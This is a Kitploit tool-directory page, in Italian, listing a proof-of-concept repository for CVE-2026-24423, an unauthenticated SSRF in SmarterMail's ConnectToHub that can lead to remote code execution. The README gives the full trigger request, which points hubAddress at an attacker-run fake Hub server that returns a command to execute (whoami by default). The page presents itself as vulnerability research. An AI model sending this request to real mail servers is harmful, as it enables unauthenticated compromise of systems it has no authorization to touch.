Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24423 — Script di riproduzione per CVE-2026-24423, una violazione del confine di fiducia in SmarterMail ConnectToHub che porta a SSRF e potenziale esecuzione remota di codice. Include un server Hub simulato e istruzioni per attivare l'API vulnerabile. | Kitploit
Strumenti/GitHubGitHub/aavamin/cve-2026-24423
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubaavamin/cve-2026-24423

CVE-2026-24423

Script di riproduzione per CVE-2026-24423, una violazione del confine di fiducia in SmarterMail ConnectToHub che porta a SSRF e potenziale esecuzione remota di codice. Include un server Hub simulato e istruzioni per attivare l'API vulnerabile.

Vedi Repository
8187 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24423

root@kitploit:~
# CVE-2026-24423 – Riproduzione

> ⚠️ **Solo per ricerca sulla sicurezza e test autorizzati / For security research and authorized testing only**


## Introduzione (Overview)

Questo progetto serve a riprodurre la vulnerabilità **CVE-2026-24423**.  
La vulnerabilità esiste nella funzionalità **SmarterMail ConnectToHub** e la sua causa principale è:

- Le interfacce a livello amministrativo non richiedono autenticazione  
- Il server si connette attivamente all'Hub specificato dall'utente (SSRF)  
- I dati restituiti dall'Hub esterno vengono utilizzati direttamente per operazioni a livello di sistema locale  

Questa vulnerabilità è una **violazione del confine di fiducia a livello di progettazione (Trust Boundary Violation)** e può infine portare all'esecuzione remota di codice.

Questo repository è destinato esclusivamente alla **verifica della vulnerabilità e alla ricerca tecnica**, non all'uso come arma.

Utilizzo (Usage)

1️⃣ Avvia il servizio di simulazione Hub

Start Hub Simulation Server

root@kitploit:~
python3 cve-2026-24423.py

Questo script:

  • Ascolta sulla porta 80
  • Simula l'interfaccia Hub di SmarterMail
  • Restituisce una risposta JSON contenente la configurazione SystemMount

2️⃣ Attiva l'API vulnerabile

Trigger the Vulnerable API

Usa Yakit o Burp Suite per inviare la richiesta:

root@kitploit:~
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json

{
  "hubAddress": "http://ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

Questa interfaccia non richiede autenticazione No authentication is required.


3️⃣ Gestione degli errori di riproduzione

Troubleshooting

Se la riproduzione della vulnerabilità fallisce:

  • Modifica il parametro MountPath in cve-2026-24423.py

4️⃣ Risultato della riproduzione

Result

Quando la vulnerabilità viene attivata con successo, SmarterMail analizza i dati restituiti dall'Hub; il codice predefinito esegue solo il comando whoami.

Screenshot di esempio / Example:

result


Crediti (Credit)

Questo progetto è stato realizzato da ChatGPT.

Scarica lo strumento